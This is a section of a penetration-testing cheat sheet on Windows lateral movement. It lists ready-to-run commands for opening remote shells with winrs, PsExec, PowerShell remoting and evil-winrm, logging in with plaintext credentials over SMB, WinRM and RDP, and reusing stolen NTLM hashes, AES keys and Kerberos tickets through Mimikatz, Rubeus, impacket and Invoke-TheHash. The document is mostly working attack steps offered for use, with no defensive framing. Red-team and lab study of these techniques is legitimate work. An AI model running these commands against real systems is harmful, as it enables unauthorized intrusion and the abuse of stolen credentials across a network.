# 6. Next steps

### 6.1. Do we have access?

winrs

```powershell
winrs -r:<HOSTNAME> cmd
```

PsExec

```powershell
.\PsExec.exe \\<HOSTNAME> cmd
```

PS-Script

```powershell
# Step 1: open a remote session
$sess = New-PSSession -ComputerName <HOST>
# Step 2: enter the session interactively
Enter-PSSession -Session $sess
```

Script Block

```powershell
# Step 1: open a remote session
$sess = New-PSSession -ComputerName <HOST>
# Step 2: run a script block in that session
Invoke-Command -Session $sess -ScriptBlock {ipconfig;whoami;pwd}
```

WSManWinRM

```powershell
Invoke-WSManWinRM -hostname <HOST> -command cmd
```

### 6.2. Do we have credentials?

{% code overflow="wrap" %}

```powershell
winrs -r:<HOST> -u:<Domain>\<USER> -p:<PASS> cmd
.\PsExec.exe -u <Domain>\<USER> -p <PASS> \\<HOSTNAME> cmd
impacket-psexec <Domain>/<USER>:<PASS>@<IP>

#WSManWinRM
Invoke-WSManWinRM -hostname <HOST> -command cmd -user <Domain>\<USER> -password <PASS>

evil-winrm -i <IP> -u '<Domain>\<USER>' -p <PASS>

#RDP Access
rdesktop -a 16 <IP> -u '<DOMAIN>\<USER>' -p <PASS>
xfreerdp /v:<IP> /u:"<USER>" /p:<PASS>
```

{% endcode %}

### 6.3. Pass The Hash

{% code overflow="wrap" %}

```powershell
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<NTLM> /run:powershell.exe"'
impacket-psexec -hashes ":<NTLM>" <USER>@<IP>
evil-winrm -u <USER> -H <NTLM> -i <IP>
pth-winexe -U <Domain>/<USER>%<LM:NT> //<IP> cmd

#Impacket For Win
.\psexec_windows.exe -hashes ":<NTLM>" <USER>@<IP>

#Invoke-TheHash
Invoke-SMBExec -Target <PC.Full.Domain> -Domain <Full.Domain> -Username <USER> -Hash <NTLM> -Command '<COMMAND>' -Verbose
```

{% endcode %}

### 6.4. OverPass The Hash (OPTH) or Pass The Key (PTK)

{% code overflow="wrap" %}

```powershell
Rubeus.exe asktgt /user:<USER> /rc4:<NTLM> /ptt
.\PsExec.exe -accepteula \\<HOST> cmd
winrs -r:<HOST> cmd

Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<Full.Domain> /aes256:<aes256key> /run:cmd.exe"'

# Step 1: request a TGT with the NTLM hash (written to <USER>.ccache)
impacket-getTGT <domain.full>/<USER> -hashes ":<NTLM>"
# Step 2: point Kerberos tooling at the cached ticket
export KRB5CCNAME=$(pwd)/<USER>.ccache
# Step 3: authenticate with the ticket instead of a password
impacket-psexec <domain.full>/<USER>@<IP> -k -no-pass
```

{% endcode %}

### 6.5. Pass The Ticket (PTT)

```powershell
Invoke-Mimikatz -Command '"kerberos::ptt <C:\Path\To\Ticket>"'
Rubeus.exe ptt /ticket:<base64 Ticket>

#access
.\PsExec.exe -accepteula \\<HOST> cmd
winrs -r:<HOST> cmd
```
